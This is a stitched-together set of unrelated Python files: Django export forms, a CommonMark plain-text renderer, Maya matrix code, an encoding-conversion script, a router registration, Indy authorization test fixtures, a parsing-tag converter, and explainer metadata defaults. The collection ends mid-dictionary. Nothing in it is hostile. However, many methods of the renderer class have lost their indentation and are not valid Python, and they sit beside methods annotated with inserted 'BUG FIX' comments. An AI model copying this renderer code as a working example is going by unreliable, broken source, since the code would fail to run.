class SelectAuthorityCollectionForm(forms.Form):
    """Form for picking an existing authority collection."""

    collection = forms.ModelChoiceField(queryset=AuthorityCollection.objects.all())
    filters = forms.CharField(widget=forms.widgets.HiddenInput())
class ExportCitationsForm(forms.Form):
    """Form configuring a bulk export of citation records."""

    export_name = forms.CharField(help_text='This tag will be added to the export filename')
    export_format = forms.ChoiceField(choices=[('CSV', 'Comma-separated values (CSV)'), ('EBSCO_CSV', 'Comma-separated values (CSV) in EBSCO format (disregard column selection below)'), ('ITEM_COUNT', 'Export for Item Counts'), ('SWP_ANALYSIS', "Export for SPW Analysis")])
    export_linked_records = forms.BooleanField(label="Export linked records (make sure that the 'Link to Record' Field is selected in the field list)", required=False)
    export_metadata = forms.BooleanField(label="Export metadata", required=False)
    use_pipe_delimiter = forms.BooleanField(label='Use "||" to separate related authority and citation fields', required=False)
    fields = forms.MultipleChoiceField(choices=[(c.slug, c.label) for c in export.CITATION_COLUMNS], required=False)
    filters = forms.CharField(widget=forms.widgets.HiddenInput())

    def clean_fields(self):
        """Require an explicit column selection for the plain-CSV format."""
        selected = self.cleaned_data['fields']
        if self.cleaned_data['export_format'] == 'CSV' and not selected:
            raise forms.ValidationError("Please select fields to export.")
        return selected
class ExportAuthorityForm(forms.Form):
    """Form configuring a bulk export of authority records."""

    export_name = forms.CharField(help_text='This tag will be added to the export filename')
    export_format = forms.ChoiceField(choices=[('CSV', 'Comma-separated values (CSV)')])
    export_metadata = forms.BooleanField(label="Export metadata", required=False)
    fields = forms.MultipleChoiceField(choices=[(c.slug, c.label) for c in export_authority.AUTHORITY_COLUMNS])
    filters = forms.CharField(widget=forms.widgets.HiddenInput())
class BulkChangeCSVForm(forms.Form):
    """Form for uploading a CSV file and selecting the bulk change to apply."""

    csvFile = forms.FileField()

    # Bulk-change action codes.
    NO_CHOICE = None
    CREATE_ATTR = 'CRATT'
    UPDATE_ATTR = 'UPATT'
    CREATE_LINKED_DATA = 'CRLD'
    CREATE_ACRELATIONS = 'CRACR'
    CREATE_AARELATIONS = 'CRAAR'
    CREATE_CCRELATIONS = 'CRCCR'
    CREATE_AUTHORITIES = 'CRAUTH'
    CREATE_CITATIONS = 'CRCIT'
    MERGE_AUTHORITIES = 'MGAUTH'

    CHOICES = [
        (NO_CHOICE, '-------------'),
        (CREATE_ATTR, 'Create Attributes'),
        (UPDATE_ATTR, 'Update Elements'),
        (CREATE_LINKED_DATA, 'Create Linked Data'),
        (CREATE_ACRELATIONS, 'Create ACRelations'),
        (CREATE_AARELATIONS, 'Create AARelations'),
        (CREATE_CCRELATIONS, 'Create CCRelations'),
        (CREATE_AUTHORITIES, 'Create Authorities'),
        (CREATE_CITATIONS, 'Create Citations'),
        (MERGE_AUTHORITIES, 'Duplicate Authority Merge and Redirect'),
    ]

    action = forms.ChoiceField(choices=CHOICES)
|
# see https://github.com/rtfd/CommonMark-py/blob/master/CommonMark/render/html.py
# for the HTML renderer -- this is just a riff on that.
import re
import commonmark
import commonmark.render.renderer
class RawHtmlNotAllowed(ValueError):
    """Raised when the plain-text renderer encounters raw HTML input."""
    def __init__(self):
        message = "Raw HTML cannot be rendered by the plain text renderer."
        super(RawHtmlNotAllowed, self).__init__(message)
class ListBlock:
    """State for one list block: its type ('bullet' or 'ordered'), the
    running ordered-list counter, and the bullet character for bullet lists."""

    def __init__(self, list_type, start_value, bullet_char):
        self.list_type = list_type
        self.value = start_value
        self.bullet_char = bullet_char

    def __str__(self):
        # The list block itself contributes nothing to line indentation;
        # indentation comes from the per-item ItemBullet objects.
        return ""
class ItemBullet:
    """Emits a list item's bullet exactly once; afterwards its str() is
    matching-width indentation for the item's continuation lines."""

    def __init__(self, listblock):
        self.listblock = listblock
        self.emitted = None  # becomes the bullet text after first emission

    def __str__(self):
        if self.emitted is not None:
            # Already emitted: pad continuation lines to the bullet's width.
            return " " * len(self.emitted)
        block = self.listblock
        if block.list_type == "bullet":
            self.emitted = block.bullet_char + " "
        elif block.list_type == "ordered":
            self.emitted = str(block.value) + ". "
            block.value += 1
        else:
            raise ValueError(block.list_type)
        return self.emitted
class PlainTextRenderer(commonmark.render.renderer.Renderer):
def __init__(self):
self.setext_heading_chars = ["#", "=", "-"]
self.block_indent = []
    def emit_intent(self):
        # Emit the current block indentation (bullets and/or spaces) at the
        # start of a line. NOTE(review): the name is likely a typo for
        # "emit_indent"; kept because other methods call it by this name.
        self.lit("".join(str(b) for b in self.block_indent))
    def emit_end_block(self, node):
        # Close a block with a blank separator line — adapted from the
        # HtmlRenderer's block-closing logic.
        grandparent = node.parent.parent
        if grandparent is not None and grandparent.t == 'list' and grandparent.list_data['tight']:
            # Within a TIGHT list, don't add a double-newline between blocks.
            # (The original comment said "loose list", but the condition
            # tests list_data['tight'].)
            pass
        else:
            self.emit_intent()
            self.cr()
    def text(self, node, entering=None):
        # Write literal text through out(), the base renderer's overridable
        # output hook, rather than lit().
        self.out(node.literal)
    def softbreak(self, node=None, entering=None):
        # A soft line break becomes a real newline followed by the current
        # block indentation.
        self.cr()
        self.emit_intent()
    def linebreak(self, node=None, entering=None):
        # Hard breaks render identically to soft breaks in plain text:
        # newline plus the current block indentation.
        self.cr()
        self.emit_intent()
    def link(self, node, entering):
        # Remember where the link text starts in the output buffer; on exit,
        # append the destination in angle brackets — unless the rendered text
        # already equals the destination (autolink style), in which case
        # repeating it would be redundant.
        if entering:
            self.link_start = len(self.buf)
        else:
            text = self.buf[self.link_start:]
            if text != node.destination:
                self.lit(" <" + node.destination + ">")
def image(self, node, entering):
if entering:
self.lit('[image]')
else:
pass
    def emphstronglevel(self, node):
        """Count emph/strong delimiters that immediately enclose or precede
        this node, so nested or adjacent emphasis can alternate between the
        '*' and '_' delimiter families (see emph/strong below)."""
        if (node.parent.t in ("emph", "strong") and node is node.parent.first_child):
            return self.emphstronglevel(node.parent) + 1
        elif node.prv and node.prv.t in ("emph", "strong"):
            return self.emphstronglevel(node.prv) + 1
        return 0
def emph(self, node, entering):
# same symbol entering & exiting, but must alternate between * and _
# when nested immediately within or following a strong/emph.
if (self.emphstronglevel(node) % 2) == 0:
self.lit("*")
else:
self.lit("_")
def strong(self, node, entering):
# same symbol entering & exiting, but must alternate between * and _
# when nested immediately within or following a strong/emph.
if (self.emphstronglevel(node) % 2) == 0:
self.lit("**")
else:
self.lit("__")
def paragraph(self, node, entering):
if entering:
self.emit_intent()
else:
self.cr()
self.emit_end_block(node)
def heading(self, node, entering):
if entering:
self.emit_intent()
self.heading_start = len(self.buf)
else:
if node.level <= len(self.setext_heading_chars):
heading_len = len(self.buf) - self.heading_start
if heading_len == 0:
# CommonMark requires that the heading still be emitted even if
# empty, so fall back to a setext-style heading.
self.lit("#" * node.level + " ")
else:
self.cr()
self.emit_intent()
self.lit(self.setext_heading_chars[node.level-1] * heading_len)
self.cr()
self.emit_end_block(node)
def code(self, node, entering):
# Just do actual CommonMark here. The backtick string around the literal
# must have one more backtick than the number of consecutive backticks
# in the literal.
backtick_string = "`"
while backtick_string in node.literal:
backtick_string += "`"
self.lit(backtick_string)
if node.literal.startswith("`") or node.literal == "":
# Must have space betweet a literal backtick within the code,
# and if the code is totally empty there must be space between
# the start and end backticks.
self.lit(" ")
self.lit(node.literal) # this is correct as lit() and not out() for CommonMark-compliant output
if node.literal.endswith("`"):
self.lit(" ")
self.lit(backtick_string)
def code_block(self, node, entering):
# open code block
self.emit_intent()
self.emit_code_block_fence(node.literal, node.info)
# each line, with indentation; note that the literal is a literal
# and must not be escaped
self.emit_intented_literal(node.literal)
# close code block
self.emit_intent()
self.emit_code_block_fence(node.literal)
self.emit_end_block(node)
def emit_code_block_fence(self, literal, language=None):
width = max([len(line.replace("\t", " ")) for line in literal.split("\n")])
self.lit("-" * width + "\n")
def emit_intented_literal(self, literal):
lines = literal.split("\n")
while len(lines) > 0 and lines[-1] == "":
# The parser sometimes includes an extra blank line.
# Might be a parser bug?
lines.pop(-1)
break
for line in lines:
self.emit_intent()
self.lit(line + "\n")
def thematic_break(self, node, entering):
self.emit_intent()
self.lit("-" * 60)
self.cr()
self.emit_end_block(node)
def block_quote(self, node, entering):
if entering:
self.block_indent.append("> ")
self.block_quote_start = len(self.buf)
else:
if self.block_quote_start == len(self.buf):
# If no content, still must emit something.
self.emit_intent()
self.cr()
self.block_indent.pop(-1)
def list(self, node, entering):
if entering:
# We could re-use the bullet character from the input:
# bullet_char = node.list_data['bullet_char']
# but for better normalization we'll choose a bullet char by
# alternating through *, -, and + as we go deeper into levels.
bullet_level = len(list(filter(lambda b : isinstance(b, ListBlock) and b.list_type == "bullet", self.block_indent)))
bullet_char = ["*", "-", "+"][bullet_level % 3]
# TODO #1: Two lists next to each other are distinguished as
# different if they have either a different bullet (for bulleted
# lists) or a different delimiter (the "." or ")" after the number,
# for ordered lists). That distinction might be lost here and
# would result in two lists being combined into one.
# TODO #2: A list can be loose or tight, but we don't output them
# any differently.
self.block_indent.append(ListBlock(node.list_data['type'], node.list_data['start'], bullet_char))
else:
self.block_indent.pop(-1)
self.emit_end_block(node)
def item(self, node, entering):
if entering:
# Find the ListBlock that was most recently added to self.block_indent.
parent_list = [b for b in self.block_indent if isinstance(b, ListBlock)][-1]
self.block_indent.append(ItemBullet(parent_list))
self.item_start = len(self.buf)
else:
if len(self.buf) == self.item_start:
# Always emit a bullet even if there was no content.
self.emit_intent()
self.cr()
self.block_indent.pop(-1)
def html_inline(self, node, entering):
raise RawHtmlNotAllowed()
def html_block(self, node, entering):
raise RawHtmlNotAllowed()
def custom_inline(self, node, entering):
# copied from the HTML renderer
if entering and node.on_enter:
self.lit(node.on_enter)
elif (not entering) and node.on_exit:
self.lit(node.on_exit)
def custom_block(self, node, entering):
# copied from the HTML renderer
self.cr()
if entering and node.on_enter:
self.lit(node.on_enter)
elif (not entering) and node.on_exit:
self.lit(node.on_exit)
self.emit_end_block(node)
class CommonMarkToCommonMarkRenderer(PlainTextRenderer):
    """Render a CommonMark AST back to normalized CommonMark markup.

    Extends PlainTextRenderer by escaping significant characters, and by
    emitting real emphasis/link/image/heading/code syntax. Raw HTML is
    passed through verbatim instead of being rejected.
    """
    def __init__(self):
        super(CommonMarkToCommonMarkRenderer, self).__init__()
        # Only heading levels 1 and 2 have setext underlines in CommonMark.
        self.setext_heading_chars = ["=", "-"]
    def out(self, s):
        """Escape characters significant to CommonMark, then emit.

        While all ASCII punctuation can be escaped
        (http://spec.commonmark.org/0.28/#ascii-punctuation-character),
        not all of it has significance, and some of it only in certain
        contexts (e.g. start of line) that we cannot see here — so this
        over-escapes slightly on the safe side.
        """
        always_escape = {
            "`", "~", # fenced code blocks, code spans
            "<", # raw HTML start conditions
            "*", "_", # emphasis and strong emphasis
            "[", "]", # link text
            "<", ">", # link destination, autolink
            "\"", "'", # link title
            # "(", ")", # inline link -- if it were valid, it would have balanced parens so escaping would not be necessary?
            "!", # image
        }
        # Always escape the characters above.
        pattern = "|".join(re.escape(c) for c in always_escape)
        # Escape things that look like character references but aren't.
        pattern += r"|&\w+;|&#[Xx]?[0-9A-Fa-f]+;"
        # Some characters only need escaping at the start of a line, which we
        # cannot detect here. Approximate it: escape them unless they follow
        # something that could not precede them at a line start.
        escape_at_line_start = {
            "---", "___", "***", # thematic break
            "#", # ATX headers
            "=", "-", # setext underline
            "[", # link reference definitions (but not the colon since a stray colon could not be confused here)
            ">", # block quotes
            "-", "+", "*", # bullet list marker
        }
        pattern += "|" + "|".join("(?<![A-Za-z0-9])" + re.escape(c) for c in escape_at_line_start)
        # The ordered list markers need escapes just when they follow a digit.
        pattern += r"|(?<=[0-9])[\.\)]"
        # Escape backslashes if followed by punctuation (other backslashes
        # cannot be for escapes and are treated literally).
        ascii_punctuation_chars = "!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"
        pattern += r"|\\(?=[" + re.escape(ascii_punctuation_chars) + "])"
        # Apply substitutions.
        # BUG FIX: re.sub's 4th positional argument is `count`, not `flags`;
        # passing re.M there silently capped escaping at 8 substitutions.
        s = re.sub(pattern, lambda m : "\\" + m.group(0), s, flags=re.M)
        super(CommonMarkToCommonMarkRenderer, self).out(s)
    def linebreak(self, node=None, entering=None):
        # Hard line break: backslash before the newline.
        self.lit("\\\n")
        self.emit_intent()
    def link(self, node, entering):
        # Determine if the link label and the destination are the same by
        # rendering this node using the plain text renderer. Luckily, if they
        # are the same, the plain text renderer simply emits the label
        # without the destination.
        link_label = PlainTextRenderer().render(node)
        label_matches = (link_label == node.destination) \
            or ("mailto:" + link_label.lower() == node.destination.lower())
        # BUG FIX: parenthesized so the scheme check applies to both cases
        # (previously `and` bound tighter than `or`), and dropped the
        # redundant double .lower().
        if label_matches and re.match(r"[A-Za-z][A-Za-z0-9+\.-]{1,32}:[^<> ]*$", node.destination):
            # Emit an autolink.
            if entering:
                destination = node.destination
                if destination.lower().startswith("mailto:"):
                    # Email autolinks are written without the scheme.
                    destination = destination[7:]
                self.lit("<")
                # BUG FIX: emit the possibly-stripped destination (it was
                # computed but node.destination was emitted instead).
                self.lit(destination)
                self.lit(">")
                self.autolink_start = len(self.buf)
            else:
                # kill any content emitted within this node
                self.buf = self.buf[0:self.autolink_start]
        else:
            if entering:
                self.lit("[")
            else:
                self.lit("](")
                # When wrapping the destination with parens, then internal parens
                # must be either well-nested (which is hard to detect) or escaped.
                self.lit(node.destination.replace("(", "\\(").replace(")", "\\)"))
                if node.title:
                    self.lit(" \"")
                    # When wrapping the title in double quotes, internal double
                    # quotes must be escaped.
                    self.lit(node.title.replace("\"", "\\\""))
                    self.lit("\"")
                self.lit(")")
    def image(self, node, entering):
        # BUG FIX: this method was garbled (an unterminated string literal
        # and a missing else branch). Image syntax mirrors link syntax with
        # a leading "!": ![alt](destination "title").
        if entering:
            self.lit("![")
        else:
            self.lit("](")
            # same as link, see above
            self.lit(node.destination.replace("(", "\\(").replace(")", "\\)"))
            if node.title:
                # same as link, see above
                self.lit(" \"")
                self.lit(node.title.replace("\"", "\\\""))
                self.lit("\"")
            self.lit(")")
    def heading(self, node, entering):
        if node.level <= 2:
            # Prefer setext-style heading for levels 1 and 2, because it is
            # the only style that supports multi-line content within it, which
            # we might have (and we don't know at this point).
            super(CommonMarkToCommonMarkRenderer, self).heading(node, entering)
        else:
            # Use ATX-style headings for other levels.
            if entering:
                self.lit("#" * node.level + " ")
                # Indent continuation lines under the heading text.
                self.block_indent.append(" " * (node.level+1))
            else:
                self.cr()
                self.block_indent.pop(-1)
    def emit_code_block_fence(self, content, info_string=None):
        # Choose a fence string that does not appear in the content
        # of the code block. A fence string can be made up of
        # backticks or tildes, but we'll stick to backticks.
        fence_string = "```"
        while fence_string in content:
            fence_string += fence_string[0]
        self.lit(fence_string)
        if info_string:
            # The info string (language) is escapable text.
            self.out(info_string)
        self.cr()
    def html_inline(self, node, entering):
        # Unlike the plain-text renderer, raw HTML round-trips verbatim.
        self.lit(node.literal)
    def html_block(self, node, entering):
        self.lit('\n')
        self.emit_intented_literal(node.literal)
        self.emit_end_block(node)
# Define a new helper method that would be an in-place replacement
# for commonmark.commonmark.
# NOTE(review): despite the name, this renders with PlainTextRenderer,
# so it returns plain text, not HTML — confirm the name is intentional.
def commonmark_to_html(markup):
    """Parse CommonMark ``markup`` and render it with PlainTextRenderer."""
    parser = commonmark.Parser()
    ast = parser.parse(markup)
    return PlainTextRenderer().render(ast)
if __name__ == "__main__":
    # Run the parser on STDIN and write to STDOUT.
    import sys
    print(commonmark_to_html(sys.stdin.read()))
|
import maya.cmds as cmds
import maya.OpenMaya as om
from keychain.api.utils import matrix as matrix_utils
def get_xform_relation(driver, target, start=None, end=None):
    """Compute `target`'s per-frame local transform relative to `driver`.

    For every frame in [start, end), the driver's delta from its pose at
    `start` is applied to the target's anchor pose, and the result is
    expressed in the target's parent space and decomposed.

    Args:
        driver (str): transform node driving the motion.
        target (str): transform node whose local values are computed.
        start (int, optional): first frame. Defaults to the playback range
            start. (The original code referenced undefined ``start``/``end``
            names, which raised NameError at runtime.)
        end (int, optional): one past the last frame processed. Defaults to
            the playback range end.

    Returns:
        list: decomposed transform values, one entry per frame.
    """
    # Default to the scene's current playback range when no explicit
    # frame window is given (backward-compatible generalization).
    if start is None:
        start = int(cmds.playbackOptions(query=True, minTime=True))
    if end is None:
        end = int(cmds.playbackOptions(query=True, maxTime=True))
    # Rotation order of the target drives the matrix decomposition below.
    rotOrder = cmds.getAttr("{}.rotateOrder".format(target))
    # Driver's world-inverse matrix at the anchor frame.
    driverInverseMatrix = matrix_utils.get_matrix_from_xform(
        driver,
        start,
        "worldInverseMatrix"
    )
    # Target's world matrix at the anchor frame.
    anchorMatrix = matrix_utils.get_matrix_from_xform(
        target,
        start,
        "worldMatrix"
    )
    frame_values = []
    for i in range(start, end):
        # Driver and target matrices at the current frame.
        driverMatrix = matrix_utils.get_matrix_from_xform(
            driver,
            i,
            "worldMatrix"
        )
        inverseMatrix = matrix_utils.get_matrix_from_xform(
            target,
            i,
            "parentInverseMatrix"
        )
        # Driver's delta relative to its pose at the start frame.
        differenceMatrix = driverInverseMatrix * driverMatrix
        # Anchor pose moved by that delta, in the target's parent space.
        localMatrix = differenceMatrix * anchorMatrix * inverseMatrix
        # Extract transform values from the matrix, honoring the pivot.
        rotPivot = cmds.getAttr("{}.rotatePivot".format(target))[0]
        transformValues = matrix_utils.decomposeMatrix(
            localMatrix,
            rotOrder,
            rotPivot,
        )
        # BUG FIX: the computed values were previously discarded.
        frame_values.append(transformValues)
    return frame_values
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
-----------------------------------------
@Author: zhaocy
@Email: 19110240027@fudan.edu.cn
@Created: 2020/6/22
------------------------------------------
@Modify: 2020/6/22
------------------------------------------
@Description:
"""
from chardet import detect
from definitions import DATA_DIR
if __name__ == '__main__':
    # Re-encode the raw corpus file to UTF-8, auto-detecting its encoding.
    fn = DATA_DIR + '/wiki_cn'
    with open(fn, 'rb') as f:
        s = f.read()
    # BUG FIX: the original called s.decode('ignore'), which passes
    # 'ignore' as the *encoding* (raising LookupError) and never used the
    # imported chardet.detect at all. Detect the encoding, then decode
    # with undecodable bytes ignored.
    encoding = detect(s)['encoding'] or 'utf-8'
    newf = DATA_DIR + '/wiki_cn_new.txt'
    with open(newf, 'wb') as f:
        f.write(s.decode(encoding, errors='ignore').encode('utf8'))
    print('done! converted coding to utf-8 and wrote content in `{}`'.format(newf))
|
from nodeconductor.oracle import views
def register_in(router):
    """Register all Oracle service endpoints on the given DRF router."""
    registrations = (
        (r'oracle', views.OracleServiceViewSet, 'oracle'),
        (r'oracle-zones', views.ZoneViewSet, 'oracle-zone'),
        (r'oracle-templates', views.TemplateViewSet, 'oracle-template'),
        (r'oracle-databases', views.DatabaseViewSet, 'oracle-database'),
        (r'oracle-service-project-link', views.OracleServiceProjectLinkViewSet, 'oracle-spl'),
    )
    for prefix, viewset, name in registrations:
        router.register(prefix, viewset, base_name=name)
|
import pytest
import time
from common.serializers.serialization import domain_state_serializer
from indy_common.authorize.auth_actions import AuthActionAdd, AuthActionEdit
from indy_common.authorize.auth_constraints import ConstraintsSerializer
from indy_common.authorize.auth_map import auth_map
from indy_common.authorize.auth_request_validator import WriteRequestValidator
from indy_common.test.constants import IDENTIFIERS
from indy_common.types import Request
from indy_node.persistence.idr_cache import IdrCache
from indy_node.server.node import Node
from plenum.common.constants import STEWARD, TRUSTEE
from indy_common.constants import ENDORSER, LOCAL_AUTH_POLICY, NETWORK_MONITOR, CONFIG_LEDGER_AUTH_POLICY
from plenum.common.exceptions import UnauthorizedClientRequest
from plenum.test.helper import randomOperation
from plenum.test.testing_utils import FakeSomething
from state.pruning_state import PruningState
from storage.kv_in_memory import KeyValueStorageInMemory
from indy_node.test.conftest import write_request_validation, write_auth_req_validator, idr_cache
@pytest.fixture(scope='function', params=[True, False])
def is_owner(request):
    # Parametrized over both ownership cases, so dependent tests run twice.
    return request.param
@pytest.fixture(scope='function', params=[True, False])
def off_ledger_signature(request):
    # Parametrized over both signature modes (on-ledger / off-ledger).
    return request.param
@pytest.fixture(scope='function')
def action_add(request):
    # A generic ADD auth action with placeholder type/field/value.
    return AuthActionAdd(txn_type='SomeType',
                         field='some_field',
                         value='new_value')
@pytest.fixture(scope='function')
def action_edit(request):
    # A generic EDIT auth action with placeholder old/new values.
    return AuthActionEdit(txn_type='SomeType',
                          field='some_field',
                          old_value='old_value',
                          new_value='new_value')
@pytest.fixture(scope="module")
def constraint_serializer():
    # Serializer for auth constraints, backed by the domain state serializer.
    return ConstraintsSerializer(domain_state_serializer)
@pytest.fixture(scope="module")
def config_state(constraint_serializer):
    # In-memory config-ledger state pre-populated with the default auth rules.
    state = PruningState(KeyValueStorageInMemory())
    Node.add_auth_rules_to_config_state(state=state,
                                        auth_map=auth_map,
                                        serializer=constraint_serializer)
    return state
@pytest.fixture(scope='module', params=[v[0] for v in IDENTIFIERS.values()])
def identifier(request):
    # First DID of each role from IDENTIFIERS; tests run once per role.
    return request.param
@pytest.fixture(scope='module')
def req(identifier):
    # Minimal signed request with a random operation for the given identifier.
    return Request(identifier=identifier,
                   operation=randomOperation(),
                   signature='signature')
|
from argparse import ArgumentParser
import codecs
import os
"""
To encode:
python /home/david/Escritorio/encoding2multitask.py \
--input /home/david/Escritorio/dataset/ptb/ptb-dev.seq_lu \
--output /tmp/ptb-dev.multitask \
--status encode
To decode:
python /home/david/Escritorio/encoding2multitask.py \
--input /tmp/ptb-test.multitask \
--output /tmp/ptb-test.reversed \
--status decode
"""
def tag_to_multitask(tag):
    """Convert a sequence-labeling tag into its multitask form.

    The three components (level, label, leaf unary branch) are joined by
    the "{}" separator; missing components are padded with "-EMPTY-", and
    the dummy tags (-BOS-/-EOS-/NONE) are replicated across all three.

    Raises:
        NotImplementedError: for a single-component tag that is not a
            dummy tag.
    """
    # Dummy tags carry no structure: replicate them into every slot.
    if tag in ("-BOS-", "-EOS-", "NONE"):
        return "{}".join((tag, tag, tag))
    parts = tag.split("_")
    # Full tag: (level, label, leaf unary branch).
    if len(parts) == 3:
        return "{}".join(parts)
    # Regular tag: pad the missing leaf-unary slot.
    if len(parts) == 2:
        return "{}".join((parts[0], parts[1], "-EMPTY-"))
    raise NotImplementedError("len(tag_split)==1")
"""
Transforms an encoding of a tree in a relative scale into an
encoding of the tree in an absolute scale.
"""
def to_absolute_levels(relative_levels):
absolute_sequence = [0]*len(relative_levels)
current_level = 0
for j,level in enumerate(relative_levels):
if level in ["-BOS-","-EOS-", "NONE"]:
absolute_sequence[j] = level
elif level == "ROOT":
absolute_sequence[j] = "1"
current_level+=1
else:
current_level+= int(level)
absolute_sequence[j] = str(current_level)
return absolute_sequence
#TODO: What to do if not for all tasks we return a -BOS-/-EOS- when needed. Voting approach?
def multitag_to_tag(multitag):
    """Invert tag_to_multitask: rebuild the original "_"-joined tag.

    Only the first three "{}"-separated components matter; any auxiliary
    task components appended later are discarded. Dummy labels collapse
    back to the bare dummy tag, and "-EMPTY-" leaf slots are dropped.
    """
    level, label, leaf = multitag.split("{}")[0:3]
    if label in ("-BOS-", "-EOS-", "NONE"):
        return label
    if leaf != "-EMPTY-":
        return "_".join((level, label, leaf))
    return "_".join((level, label))
def decode_int(preds):
    """Decode an in-memory '^^'-separated prediction stream.

    Each non-newline chunk is a tab-separated "word postag label" triple;
    the label's multitask encoding is collapsed back to a plain tag via
    multitag_to_tag. A bare newline chunk ends a sentence, which is then
    flushed (one token per line, blank line between sentences).

    Returns the decoded text as a single string.
    """
    output_parts = []
    sentence = []
    for chunk in preds.split('^^'):
        if chunk != "\n":
            word, postag, label = chunk.strip().split("\t")
            # Only the first three tasks matter; auxiliary ones are dropped.
            sentence.append([word, postag, multitag_to_tag(label)])
        else:
            for token in sentence:
                output_parts.append("\t".join(token) + "\n")
            sentence = []
            output_parts.append("\n")
    return "".join(output_parts)
if __name__ == '__main__':
    arg_parser = ArgumentParser()
    arg_parser.add_argument("--input", dest="input",
                            help="Path to the original encoding used in Constituent Parsing as Sequence Labeling",
                            default=None)
    arg_parser.add_argument("--output", dest="output",
                            help="Path to the output encoding, formatted as multitask learning", default=None)
    arg_parser.add_argument("--status", dest="status",
                            help="[encode|decode]")
    arg_parser.add_argument("--split_char", dest="split_char",type=str,
                            default="@")
    arg_parser.add_argument("--multitask_char", dest="multitask_char",type=str,
                            default="{}")
    args = arg_parser.parse_args()
    # Auxiliary tasks appended to every label during encoding.
    auxiliary_tasks = ["absolute_scale"]
    sentence = []
    if args.status == "encode":
        # Encode: seq-labeling tags -> multitask tags (plus absolute levels).
        f_output = codecs.open(args.output,"w")
        with codecs.open(args.input) as f_input:
            lines = f_input.readlines()
        relative_levels = []
        for l in lines:
            if l != "\n":
                word,postag,label = l.strip().split("\t")
                label = tag_to_multitask(label)
                if "absolute_scale" in auxiliary_tasks:
                    # Collect the relative level (first component) for the
                    # whole sentence; converted in one pass at sentence end.
                    relative_levels.append(label.split(args.multitask_char)[0])
                sentence.append([word,postag,label])
                #f_output.write("\t".join([word,postag,label])+"\n")
            else:
                # Blank line = sentence boundary: flush the buffered tokens.
                if "absolute_scale" in auxiliary_tasks:
                    absolute_levels = to_absolute_levels(relative_levels)
                for idtoken, token in enumerate(sentence):
                    # Append the absolute level as an extra task component.
                    token[2] += "{}"+absolute_levels[idtoken]
                    f_output.write("\t".join(token)+"\n")
                f_output.write("\n")
                sentence = []
                relative_levels = []
                absolute_levels = []
    elif args.status == "decode":
        # Decode: multitask tags -> original seq-labeling tags.
        f_output = codecs.open(args.output,"w")
        with codecs.open(args.input) as f_input:
            lines = f_input.readlines()
        for l in lines:
            if l != "\n":
                word,postag,label = l.strip().split("\t")
                label = multitag_to_tag(label) #The tasks that we care about are just the first three ones.
                sentence.append([word,postag,label])
                #f_output.write("\t".join([word,postag,label])+"\n")
            else:
                for token in sentence:
                    f_output.write("\t".join(token)+"\n")
                sentence = []
                f_output.write("\n")
|
"""
This module defines the default metadata and data dictionaries for each explanation method.
Note that the "name" field is automatically populated upon initialization of the corresponding
Explainer class.
"""
# Anchors
DEFAULT_META_ANCHOR = {"name": None,
"type": ["blackbox"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default anchor metadata.
"""
DEFAULT_DATA_ANCHOR = {"anchor": [],
"precision": None,
"coverage": None,
"raw": None} # type: dict
"""
Default anchor data.
"""
DEFAULT_DATA_ANCHOR_IMG = {"anchor": [],
"segments": None,
"precision": None,
"coverage": None,
"raw": None} # type: dict
"""
Default anchor image data.
"""
# CEM
DEFAULT_META_CEM = {"name": None,
"type": ["blackbox", "tensorflow", "keras"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default CEM metadata.
"""
DEFAULT_DATA_CEM = {"PN": None,
"PP": None,
"PN_pred": None,
"PP_pred": None,
"grads_graph": None,
"grads_num": None,
"X": None,
"X_pred": None
} # type: dict
"""
Default CEM data.
"""
# Counterfactuals
DEFAULT_META_CF = {"name": None,
"type": ["blackbox", "tensorflow", "keras"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default counterfactual metadata.
"""
DEFAULT_DATA_CF = {"cf": None,
"all": [],
"orig_class": None,
"orig_proba": None,
"success": None} # type: dict
"""
Default counterfactual data.
"""
# CFProto
DEFAULT_META_CFP = {"name": None,
"type": ["blackbox", "tensorflow", "keras"],
"explanations": ["local"],
"params": {},
"version": None} # type: dict
"""
Default counterfactual prototype metadata.
"""
DEFAULT_DATA_CFP = {"cf": None,
"all": [],
"orig_class": None,
"orig_proba": None,
"id_proto": None
} # type: dict
"""
Default counterfactual prototype metadata.
"""
# KernelSHAP
KERNEL_SHAP_PARAMS = [
'link',
'group_names',
'grouped',
'groups',
'weights',
'summarise_background',
'summarise_result',
'transpose',
'kwargs',
]
"""
KernelShap parameters updated and return in metadata['params'].
"""
DEFAULT_META_KERNEL_SHAP = {
"name": None,
"type": ["blackbox"],
"task": None,
"explanations": ["local", "global"],
"params": dict.fromkeys(KERNEL_SHAP_PARAMS),
"version": None
} # type: dict
"""
Default KernelShap metadata.
"""
DEFAULT_DATA_KERNEL_SHAP = {
"shap_values": [],
"expected_value": [],
"categorical_names": {},
"feature_names": [],
"raw": {
"raw_prediction": None,
"prediction": None,
"instances": None,
"importances": {},
}
} # type: dict
"""
Default KernelShap data.
"""
# ALE
DEFAULT_META_ALE = {
"name": None,
"type": ["blackbox"],
"explanations": ["global"],
"params": {},
"version": None
} # type: dict
"""
Default ALE metadata.
"""
DEFAULT_DATA_ALE = {
"ale_values": [],
"constant_value": None,
"ale0": [],
"feature_values": [],
"feature_names": None,
"target_names": None,
"feature_deciles": None
} # type: dict
"""
Default ALE data.
"""
# TreeShap
TREE_SHAP_PARAMS = [
'model_output',
'summarise_background',
'summarise_result',
'approximate',
'interactions',
'explain_loss',
'algorithm',
'kwargs'
]
"""
TreeShap parameters updated and return in metadata['params'].
"""
DEFAULT_META_TREE_SHAP = {
"name": None,
"type": ["whitebox"],
"task": None, # updates with 'classification' or 'regression'
"explanations": ["local", "global"],
"params": dict.fromkeys(TREE_SHAP_PARAMS),
"version": None
} # type: dict
"""
Default TreeShap metadata.
"""
DEFAULT_DATA_TREE_SHAP = {
"shap_values": [],
"shap_interaction_values": [],
"expected_value": [],
"categorical_names": {},
"feature_names": [],
"raw": {
"raw_prediction": None,
"loss": None,
"prediction": None,
"instances": None,
"labels": None,
"importances": {},
}
} # type: dict
"""
Default TreeShap data.
"""
# Integrated gradients
DEFAULT_META_INTGRAD = {
"name": None,
"type": ["whitebox"],
"explanations": ["local"],
"params": {},
"version": None
} # type: dict
"""
Default IntegratedGradients metadata.
"""
DEFAULT_DATA_INTGRAD = {
"attributions": None,
"X": None,
"forward_kwargs": None,
"baselines": None,
"predictions": None,
"deltas": None
